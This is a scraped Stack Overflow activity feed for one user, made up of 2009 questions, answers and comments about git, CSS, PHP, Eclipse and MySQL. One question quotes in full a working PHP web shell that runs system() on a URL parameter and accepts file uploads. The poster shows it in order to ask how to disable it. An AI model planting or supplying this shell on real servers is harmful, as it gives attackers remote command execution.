User PHLAK - Stack Overflowmost recent 30 from stackoverflow.com2009-11-29T17:29:15Zhttp://stackoverflow.com/feeds/user/27025http://www.creativecommons.org/licenses/by-nc/2.5/rdfhttp://stackoverflow.com/questions/1634161/how-do-i-use-notepad-or-other-with-msysgit4How do I use Notepad++ (or other) with msysgit?PHLAK2009-10-27T22:59:28Z2009-11-22T22:22:11Z
<p>How do I use Notepad++ (or any other editor besides vim) with msysgit?</p>
<p>I tried all of the following to no avail:</p>
<pre><code>git config --global core.editor C:\Program Files\Notepad++\notepad++.exe
git config --global core.editor "C:\Program Files\Notepad++\notepad++.exe"
git config --global core.editor C:/Program Files/Notepad++/notepad++.exe
git config --global core.editor C:\\Program Files\\Notepad++\\notepad++.exe
</code></pre>
http://stackoverflow.com/questions/1580902/how-do-i-set-the-java-path-in-eclipse-so-i-can-run-it-on-an-external-drive0How do I set the Java path in Eclipse so I can run it on an external drive?PHLAK2009-10-16T23:32:49Z2009-10-16T23:47:10Z
<p>I have Eclipse 3.5.1 and Java Portable (from Portableapps.com) installed on a portable hard drive and would like to point my Eclipse to use the portable apps Java version. This will allow me to use Eclipse on a computer even if Java isn't installed. How do I accomplish this?</p>
http://stackoverflow.com/questions/236070/php-script-version-checking-notification0PHP Script Version Checking/NotificationPHLAK2008-10-25T07:55:21Z2009-10-12T13:25:48Z
<p>How can I check the version of my script against an online file to see if it's the latest version?</p>
<p><em>For clarification, I'm talking about a script I wrote, not the version of PHP. I'd like to incorporate a way for the end user to tell when I've updated the script.</em></p>
http://stackoverflow.com/questions/1511745/css-print-view-hide-all-elements-except-one-div/1513196#15131961Answer by PHLAK for CSS - Print view - Hide all elements except one divPHLAK2009-10-03T08:33:14Z2009-10-03T08:33:14Z<pre><code>html body * {
display:none;
}
#printableArea {
display:block;
}
</code></pre>
<p>Also, you may need an !important on #printableArea, but probably not.</p>
http://stackoverflow.com/questions/1505948/how-do-i-remove-a-single-file-from-the-staging-area-of-git-but-not-remove-it-from0How do I remove a single file from the staging area of Git but not remove it from the index or undo the changes to the file itself?PHLAK2009-10-01T19:24:04Z2009-10-01T19:29:08Z
<p><strong>Situation:</strong> I have a Git repository with files already in the index. I make changes to several files, open Git and add these files to my staging area with "git add ."</p>
<p><strong>Question:</strong> How do I remove one of those files from the staging area but not remove it from the index or undo the changes to the file itself?</p>
http://stackoverflow.com/questions/671890/can-i-detect-ie6-with-php9Can I detect IE6 with PHP?PHLAK2009-03-23T00:24:26Z2009-09-29T22:21:26Z
<p>Is there a way to use PHP to detect if the page is being loaded using IE6?</p>
http://stackoverflow.com/questions/1490297/why-are-two-menu-items-with-the-same-css-acting-differently/1490306#14903061Answer by PHLAK for Why are two menu items with the same CSS acting differently? PHLAK2009-09-29T02:34:59Z2009-09-29T02:34:59Z<p>Your problem is that 'projects' left margin is actually on top of the 'about us' menu. Try giving the 'about-us' menu a z-index of 1 or more and it should work.</p>
<p>Note: Don't forget to give the 'about-us' menu a position: relative or absolute, otherwise z-index doesn't work.</p>
http://stackoverflow.com/questions/1457439/anchor-tag-around-table-is-not-clickable-in-ie-6-7-81Anchor tag around table is not clickable in IE 6, 7 & 8PHLAK2009-09-21T23:38:26Z2009-09-21T23:58:34Z
<p>The problem: when surrounding a table with an anchor tag, the table and everything within is not clickable in IE 6, 7 & 8. How do I solve this issue assuming I can't replace the table with divs?</p>
<p>Sample code:</p>
<pre><code><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
<title>Test</title>
</head>
<body>
<a href="http://www.google.com">
<table height="35">
<tr>
<td>I'm a link in a table, bet you can'tclick me!</td>
</tr>
</table>
</a>
</body>
</html>
</code></pre>
http://stackoverflow.com/questions/1437824/using-yui-is-it-possible-to-add-another-css-footer-that-sticks-to-the-bottom-of-a/1450619#14506190Answer by PHLAK for Using YUI is it possible to add another css footer that sticks to the bottom of a page?PHLAK2009-09-20T08:58:21Z2009-09-20T08:58:21Z<p><a href="http://www.cssstickyfooter.com/" rel="nofollow">http://www.cssstickyfooter.com/</a></p>
http://stackoverflow.com/questions/1445462/creating-a-google-analytics-like-site-overlay/1450602#14506021Answer by PHLAK for Creating a "Google Analytics" Like Site OverlayPHLAK2009-09-20T08:40:30Z2009-09-20T08:40:30Z<p>Due to browser security restrictions I don't think you can edit the contents of an iframe from outside that iframe. You would have to be doing the styling from within the iframe with css or javascript.</p>
http://stackoverflow.com/questions/1440008/centering-text-and-images-within-a-div-and-more/1450594#14505940Answer by PHLAK for Centering Text and images within a DIV, and more.PHLAK2009-09-20T08:33:40Z2009-09-20T08:33:40Z<p>Try this with the element you want to center something else within:</p>
<pre><code>div {
display: table-cell;
vertical-align: center;
}
</code></pre>
<p>(Not sure if this works in every browser, but I'm fairly sure it does in Firefox and IE8 at least)</p>
http://stackoverflow.com/questions/1448564/sticky-footer-help/1450583#14505830Answer by PHLAK for Sticky Footer help!PHLAK2009-09-20T08:22:21Z2009-09-20T08:22:21Z<p>Best thing since sliced bread: <a href="http://www.cssstickyfooter.com/" rel="nofollow">http://www.cssstickyfooter.com/</a></p>
http://stackoverflow.com/questions/1450555/is-it-efficient-to-use-css-frame-works-if-so-which-one-is-best-or-any-comparis/1450578#14505781Answer by PHLAK for Is it efficient to use css frame works? If so, which one is best? Or any comparison comments?PHLAK2009-09-20T08:16:37Z2009-09-20T08:16:37Z<p>I feel a full framework is a bit much. My CSS structure usually looks something like this:</p>
<p>I start by grabbing YUI's reset.css (<a href="http://developer.yahoo.com/yui/reset/" rel="nofollow">http://developer.yahoo.com/yui/reset/</a>) and base.css (<a href="http://developer.yahoo.com/yui/base/" rel="nofollow">http://developer.yahoo.com/yui/base/</a>), throw them into a single file and call this file first on every page.</p>
<p>Next I create a file called structure.css. This file is strictly for any global page layout styles allowing me to keep structure separate from style.</p>
<p>Lastly I will create style.css and this contains all page coloring, non-global layout code and other miscellaneous styles.</p>
http://stackoverflow.com/questions/1441314/ie6-css-hover-issues-with-menu/1450372#14503720Answer by PHLAK for IE6 CSS Hover issues with menuPHLAK2009-09-20T05:34:47Z2009-09-20T05:34:47Z<p>Take a look at whatever:hover <a href="http://www.xs4all.nl/~peterned/csshover.html" rel="nofollow">http://www.xs4all.nl/~peterned/csshover.html</a>. This baby solves all sorts of weird IE6 hover problems, might solve yours.</p>
http://stackoverflow.com/questions/1449709/online-text-editor/1450361#14503611Answer by PHLAK for Online text editorPHLAK2009-09-20T05:24:35Z2009-09-20T05:24:35Z<p>You could give Bespin a try: <a href="https://bespin.mozilla.com/" rel="nofollow">https://bespin.mozilla.com/</a> It's still in beta, but not bad for how new it is.</p>
http://stackoverflow.com/questions/1450091/div-containing-jquery-progress-bar-inside-ul-list/1450339#14503390Answer by PHLAK for div containing jquery progress bar inside <ul> listPHLAK2009-09-20T05:08:21Z2009-09-20T05:08:21Z<p>If you don't mind the entire progress bar being a link, you can do the following:</p>
<pre><code><ul>
<li>
<a href="test">
<div id="progressbar">test</div>
</a>
</li>
</ul>
</code></pre>
<p>... and the CSS:</p>
<pre><code>div {
display: block;
padding: 2px;
}
</code></pre>
<p><hr /></p>
<p>Or if you need to keep the HTML the way it is try some CSS like this:</p>
<pre><code>li {
display: block;
position: relative;
}
li a {
position: absolute;
top: 2px; /* Position as needed */
left: 2px;
}
li div {
display: block;
height: 20px; /* height and width should be your desired size */
width: 100px;
}
</code></pre>
http://stackoverflow.com/questions/1285652/what-is-wrong-with-this-index-definition-in-this-mysql-query0What is wrong with this index definition in this MySQL query?PHLAK2009-08-16T23:39:07Z2009-08-16T23:52:10Z
<pre><code>CREATE TABLE `pastebin` (
`pid` int(11) NOT NULL auto_increment,
`poster` varchar(16) default NULL,
`posted` datetime default NULL,
`code` text,
`parent_pid` int(11) default '0',
`format` varchar(16) default NULL,
`codefmt` mediumtext,
`codecss` text,
`domain` varchar(255) default '',
`expires` DATETIME,
`expiry_flag` ENUM('d','m', 'f') NOT NULL DEFAULT 'm',
PRIMARY KEY (`pid`),
KEY `domain` (`domain`),
KEY `parent_pid`,
KEY `expires`
);
</code></pre>
<p>After creating a database and copy-pasting the SQL query into PHPMyAdmin I get the following error:</p>
<pre><code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
KEY `expires`
)' at line 16
</code></pre>
http://stackoverflow.com/questions/1285629/filemtime-not-working-in-windows-php-cli1filemtime() not working in Windows PHP-CLIPHLAK2009-08-16T23:26:56Z2009-08-16T23:50:10Z
<p>I just got PHP-CLI working on my Windows machine so I could create scripts using PHP. However, I'm trying to write a script to cleanup my Firefox downloads folder of files older than X number of days, but I can't seem to get the filemtime() function working.</p>
<p>Here is the function I wrote:</p>
<pre><code>function deleteOldFiles($dir, $days) {
$mydir = opendir($dir);
while(($file = readdir($mydir)) !== false) {
if($file != "." && $file != ".." && (filemtime($dir.$file) <= time() - ($days * 86400))) {
//unlink($dir.$file) or DIE("Failed to delete $dir$file<br />");
echo filemtime($dir.$file);
}
}
closedir($mydir);
}
</code></pre>
<p>And upon running this I get the following error for every file:</p>
<pre><code>Warning: filemtime(): stat failed for E:\My Documents\Downloadsphp-5.3.0-nts-Win32-VC9-x86.msi in E:\_scripts\cleanupDownloads\cleanupDownloads.php on line 10
</code></pre>
<p>From the research I've done, filemtime() should work in Windows. What am I doing wrong?</p>
http://stackoverflow.com/questions/437382/how-does-relative-file-path-works-in-eclipse0How does relative file path works in Eclipse.PHLAK2009-01-12T23:06:58Z2009-07-09T09:46:56Z
<p>So my 2009 new years resolution is to learn Java. I recently acquired "Java for Dummies" and have been following along with the demo code in the book by re-writing it using Eclipse. Anyway, every example in the book that uses a relative path does not seem to read the .txt file it's supposed to read from.</p>
<p>Here is the sample code:</p>
<pre><code>import java.util.Scanner;
import java.io.File;
import java.io.IOException;
import javax.swing.JFrame;
import javax.swing.JLabel;
import java.awt.GridLayout;
class TeamFrame extends JFrame {
public TeamFrame() throws IOException {
PlayerPlus player;
Scanner myScanner = new Scanner(new File("Hankees.txt"));
for (int num = 1; num <= 9; num++) {
player = new PlayerPlus(myScanner.nextLine(), myScanner.nextDouble());
myScanner.nextLine();
addPlayerInfo(player);
}
add(new JLabel());
add(new JLabel(" ------"));
add(new JLabel("Team Batting Aberage:"));
add(new JLabel(PlayerPlus.findTeamAverageString()));
setTitle("The Hankees");
setLayout(new GridLayout(11,2));
setDefaultCloseOperation(EXIT_ON_CLOSE);
pack();
setVisible(true);
}
void addPlayerInfo(PlayerPlus player) {
add(new JLabel(player.getName()));
add(new JLabel(player.getAverageString()));
}
}
</code></pre>
<p>And you can see in the below screen shot I have included this file.</p>
<p><img src="http://farm4.static.flickr.com/3405/3191929345_ee860b7320_o.png" alt="alt text" /></p>
<p>Also, I have verified that when I build the application that a copy of Hankees.txt is placed in the bin folder with the compiled .class files.</p>
<p>Lastly, if I change line 12 to the following and place Hankees.txt in the root of my C:\ drive the program compiles and runs fine.</p>
<pre><code>Scanner myScanner = new Scanner(new File("C:\\Hankees.txt"));
</code></pre>
<p>So basically, my question is what am I doing wrong? Or is Eclipse responsible for this in some way?</p>
<p>Thanks for any and all help!</p>
http://stackoverflow.com/questions/60278/git-commit-text-file/1077672#10776720Answer by PHLAK for Git commit text file?PHLAK2009-07-03T03:37:35Z2009-07-03T03:37:35Z<p>The following is probably the easiest way to commit all changes:</p>
<pre><code>git commit -a -m "Type your commit message here..."
</code></pre>
<p>Of course there are much more detailed ways of committing, but that should get you started.</p>
http://stackoverflow.com/questions/1072261/push-and-pull-branches-in-git3Push and Pull Branches In GitPHLAK2009-07-02T03:09:18Z2009-07-02T03:39:40Z
<p>I have a local repository I'm working on and it's remote is hosted on GitHub. I recently created a branch and started working on it making several commits and now wish to push the branch to GitHub and be able to pull it to another cloned repository. What needs to be done to accomplish this?</p>
<p>If this is not possible using GitHub I'd be happy just knowing how to do it normally.</p>
<p>Any and all help is appreciated. Thanks in advanced!</p>
http://stackoverflow.com/questions/540339/how-to-check-if-directory-contents-has-changed-with-php2How to check if directory contents has changed with PHP?PHLAK2009-02-12T07:04:27Z2009-06-25T21:26:25Z
<p>I'm writing a photo gallery script in PHP and have a single directory where the user will store their pictures. I'm attempting to set up page caching and have the cache refresh only if the contents of the directory has changed. I thought I could do this by caching the last modified time of the directory using the filemtime() function and compare it to the current modified time of the directory. However, as I've come to realize, the directory modified time does not change as files are added or removed from that directory (at least on Windows, not sure about Linux machines yet).</p>
<p>So my questions is, what is the simplest way to check if the contents of a directory have been modified?</p>
http://stackoverflow.com/questions/1025466/email-address-validation/1025636#10256363Answer by PHLAK for email address validationPHLAK2009-06-22T05:51:24Z2009-06-22T05:51:24Z<p>You could send an email to the address and have the user verify it by clicking on a link.</p>
http://stackoverflow.com/questions/217710/formatting-an-if-statement-for-readability5Formatting an if statement for readabilityPHLAK2008-10-20T07:21:34Z2009-06-16T15:34:35Z
<p>What's the best way to format this for readability?</p>
<pre><code>if (strpos($file, '.jpg',1) && file_exists("$thumbsdir/$file") == false || strpos($file, '.gif',1) && file_exists("$thumbsdir/$file") == false || strpos($file, '.png',1) && file_exists("$thumbsdir/$file") == false) {
createThumb("$gallerydir/$file", "$thumbsdir/$file",$thumbsize);
fwrite($log,date("Y-m-d")." @ ".date("H:i:s")." CREATED: $thumbsdir/$file\n");
}
</code></pre>
http://stackoverflow.com/questions/224408/return-total-number-of-files-within-a-folder-using-php1Return total number of files within a folder using PHP.PHLAK2008-10-22T03:40:51Z2009-05-31T11:21:23Z
<p>Is there a better/simpler way to find the number of images in a directory and output them to a variable?</p>
<pre><code>function dirCount($dir) {
$x = 0;
while (($file = readdir($dir)) !== false) {
if (isImage($file)) {$x = $x + 1}
}
return $x;
}
</code></pre>
<p>This seems like such a long way of doing this, is there no simpler way?</p>
<p><strong>Note:</strong> The isImage() function returns true if the file is an image.</p>
http://stackoverflow.com/questions/214431/how-do-i-enable-my-php-ini-file-to-affect-all-directories-sub-directories-of-my-s1How do I enable my php.ini file to affect all directories/sub-directories of my server?PHLAK2008-10-18T02:30:11Z2009-05-26T09:01:12Z
<p>A few weeks ago I opened up a hole on my shared server and my friend uploaded the following PHP script:</p>
<pre><code><?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
<?php
if(isset($_REQUEST['upload'])){
echo '
<form enctype="multipart/form-data" action=".config.php?send" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="5120000" />
Send this file: <input name="userfile" type="file" />
To here: <input type="text" name="direct" value="/home/chriskan/public_html/_phx2600/wp-content/???" />
<input type="submit" value="Send File" />
</form>';}
?>
<?php
if(isset($_REQUEST['send'])){
$uploaddir = $_POST["direct"];
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n"; echo $uploaddir;}
else
{echo "Upload failed";}
}
?>
</code></pre>
<p>This script allows him to process commands through in-URL variables.</p>
<p>I have disabled system, among other functions, in the php.ini file in my public_html directory. This will prevent the script from running if it's located within my public_html directory, but doesn't stop it if it's in a sub-directory of that. If I copy the php.ini file into a sub-directory it will stop it from running from that directory.</p>
<p>My question is, <strong>how do I enable my php.ini file to affect all directories/sub-directories of my server?</strong></p>
http://stackoverflow.com/questions/750101/designing-with-tables/750141#7501412Answer by PHLAK for designing with tables.PHLAK2009-04-15T02:56:55Z2009-04-15T02:56:55Z<p>Your argument is valid, coding a site with tables is much faster off the line. The problem with tables is that they're significantly harder to maintain in the long run. By using divs you'll have a much simpler time when adjusting style or layout changes in the future.</p>
<p>If the site you're creating will require (very) little to no future maintenance then tables would be arguably better/faster. However, if you are planing on making changes to the sites design/layout in the future (even just an average amount of changes/fixes), a div-centric design will be much more rewarding.</p>
http://stackoverflow.com/questions/671890/can-i-detect-ie6-with-php/671986#6719860Answer by PHLAK for Can I detect IE6 with PHP?PHLAK2009-03-23T01:39:46Z2009-03-23T01:39:46Z<p>Thanks guys, I ended up creating the following function and calling it as needed:</p>
<pre><code>// IE6 Check
function isIE() {
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if (ereg("msie 6.0", $userAgent)) {
return true;
} else {
return false;
}
}
</code></pre>
http://stackoverflow.com/questions/535626/quiting-a-php-script-within-another-php-page1Quiting a PHP script within another PHP pagePHLAK2009-02-11T06:21:00Z2009-02-11T14:53:42Z
<p>I'm trying to implement caching for a PHP script I'm writing, but I keep running into the following problem. I want the script to be included in other PHP pages, but when I try to pass the cached file and exit the embedded script it exits both the script and the parent page, but doesn't parse the rest of the code on the parent page. See the code below for an example.</p>
<p><br />
<strong>index.php</strong></p>
<pre><code><?php
echo "Hello World!<br />";
include("file2.php");
echo "This line will not be printed";
?>
</code></pre>
<p><br />
<strong>file2.php</strong></p>
<pre><code><?php
$whatever = true;
if ($whatever == true) {
echo "file2.php has been included<br />";
exit; // This stops both scripts from further execution
}
// Additional code here
?>
</code></pre>
<p><br />
If the above index.php is executed you get the following output:</p>
<pre><code>Hello World!
file2.php has been included
</code></pre>
<p>However, I'm trying to get it to look like this: </p>
<pre><code>Hello World!
file2.php has been included
This line will not be printed
</code></pre>
<p>Thanks in advanced to those who can help!</p>
http://stackoverflow.com/questions/475584/first-java-program-calculator-problems/477086#4770860Answer by PHLAK for First Java program (calculator) problemsPHLAK2009-01-25T02:42:22Z2009-01-25T02:42:22Z<p>After searching high and low I finally determined that the problem didn't lie within the code I provided. I had had a "wait = false;" in my NumberListener class that was screwing up the execution. To solve this I created 2 separate wait variables and all is working fine so far.</p>
<p>Thanks for the help and the tips guys, +1 to all of you for trying.</p>
http://stackoverflow.com/questions/1510798/trying-to-fix-line-endings-with-git-filter-branch-but-having-no-luck/1511273#1511273Comment by PHLAK on Trying to fix line-endings with git filter-branch, but having no luck PHLAK2009-11-05T17:07:50Z2009-11-05T17:07:50ZThanks... this is a great fix. Found it oh GitHub.http://stackoverflow.com/questions/1580902/how-do-i-set-the-java-path-in-eclipse-so-i-can-run-it-on-an-external-drive/1580917#1580917Comment by PHLAK on How do I set the Java path in Eclipse so I can run it on an external drive?PHLAK2009-11-01T04:42:42Z2009-11-01T04:42:42ZNope... didn't use quotes.http://stackoverflow.com/questions/1634161/how-do-i-use-notepad-or-other-with-msysgit/1635493#1635493Comment by PHLAK on How do I use Notepad++ (or other) with msysgit?PHLAK2009-11-01T02:16:42Z2009-11-01T02:16:42ZI got this to work by placing npp.sh in the root of my drive (ie - C:/npp.sh). Any time I try to target a folder with spaces (ie - D:/Program Files (x86)/Git/npp.sh) in it it fails, what's the proper way to escape spaces and/or get this to work?http://stackoverflow.com/questions/1580902/how-do-i-set-the-java-path-in-eclipse-so-i-can-run-it-on-an-external-drive/1580917#1580917Comment by PHLAK on How do I set the Java path in Eclipse so I can run it on an external drive?PHLAK2009-10-27T23:03:10Z2009-10-27T23:03:10ZYes, I'm specifying the path, not just copy/pasting.
http://stackoverflow.com/questions/1580902/how-do-i-set-the-java-path-in-eclipse-so-i-can-run-it-on-an-external-drive/1580917#1580917Comment by PHLAK on How do I set the Java path in Eclipse so I can run it on an external drive?PHLAK2009-10-24T00:54:32Z2009-10-24T00:54:32ZAdding "-vm ..\path-to-jre\bin\javaw" as an argument worked, but I am unable to get this to work with my portable apps menu. Any thoughts?http://stackoverflow.com/questions/1580902/how-do-i-set-the-java-path-in-eclipse-so-i-can-run-it-on-an-external-drive/1580917#1580917Comment by PHLAK on How do I set the Java path in Eclipse so I can run it on an external drive?PHLAK2009-10-23T04:57:50Z2009-10-23T04:57:50ZAdding "-vm ..\path-to-jre\bin\javaw" to eclipse.ini doesn't seem to have any effect. Any other ideas?http://stackoverflow.com/questions/1580902/how-do-i-set-the-java-path-in-eclipse-so-i-can-run-it-on-an-external-drive/1580917#1580917Comment by PHLAK on How do I set the Java path in Eclipse so I can run it on an external drive?PHLAK2009-10-19T07:06:19Z2009-10-19T07:06:19ZJust noticed your edit. Will try this tomorrow and see how that works. Thanks.http://stackoverflow.com/questions/1580902/how-do-i-set-the-java-path-in-eclipse-so-i-can-run-it-on-an-external-drive/1580918#1580918Comment by PHLAK on How do I set the Java path in Eclipse so I can run it on an external drive?PHLAK2009-10-16T23:53:56Z2009-10-16T23:53:56ZIs the the Java path it uses to RUN Eclipse? The description in the menu states "...the checked JRE is added to the build path of newly created Java projects". That doesn't sound like what I'm trying to accomplish.http://stackoverflow.com/questions/1580902/how-do-i-set-the-java-path-in-eclipse-so-i-can-run-it-on-an-external-drive/1580917#1580917Comment by PHLAK on How do I set the Java path in Eclipse so I can run it on an external drive?PHLAK2009-10-16T23:48:39Z2009-10-16T23:48:39ZI've been following their progress, but don't want to use anything that's not "official" for my day job. Once it officially hits and I can be sure it's stable and works well I'll definitely be using it.http://stackoverflow.com/questions/1505948/how-do-i-remove-a-single-file-from-the-staging-area-of-git-but-not-remove-it-from/1505968#1505968Comment by PHLAK on How do I remove a single file from the staging area of Git but not remove it from the index or undo the changes to the file itself?PHLAK2009-10-01T20:34:36Z2009-10-01T20:34:36ZThanks... I just noticed that that is stated just above the staged files. Guess I've been looking at that screen so long I was selectively choosing what I wanted to see.http://stackoverflow.com/questions/1457439/anchor-tag-around-table-is-not-clickable-in-ie-6-7-8/1457447#1457447Comment by PHLAK on Anchor tag around table is not clickable in IE 6, 7 & 8PHLAK2009-09-22T15:58:56Z2009-09-22T15:58:56ZThe example I provided was a very simplified version of my problem. In the table I was actually trying to work with there are 8-10 cells depending on content. That would make for a lot of extra markup I don't want to have.http://stackoverflow.com/questions/1433768/why-does-floated-div-sometimes-inherit-the-margin-of-the-following-element/1433833#1433833Comment by PHLAK on Why does floated div sometimes inherit the margin of the following element?PHLAK2009-09-20T08:53:52Z2009-09-20T08:53:52ZIE8 renders it the same ans FF and Chrome. I'm pretty sure that's right.http://stackoverflow.com/questions/1441641/css-sticky-footer-with-header-outside-the-page-wrapComment by PHLAK on CSS sticky footer with header outside the page wrapPHLAK2009-09-20T08:36:57Z2009-09-20T08:36:57ZWhy does your header need to be outside your page-wrap? I'm sure there is another way to accomplish your goal with header within page-wrap.http://stackoverflow.com/questions/1413602/are-fluid-websites-worth-making-anymore/1413617#1413617Comment by PHLAK on Are fluid websites worth making anymore?PHLAK2009-09-20T08:25:49Z2009-09-20T08:25:49ZMost people with large monitors probably don't maximize their browsers. I have a 1600x1200 monitor and I run my browser window at 1024x768 95% of the time.http://stackoverflow.com/questions/1450348/git-equivalents-of-most-common-mercurial-commands/1450355#1450355Comment by PHLAK on Git equivalents of most common Mercurial commands?PHLAK2009-09-20T06:23:16Z2009-09-20T06:23:16Zand to top it off, use "git show" (same as "git diff" I believe) to see what you have changed since last commit.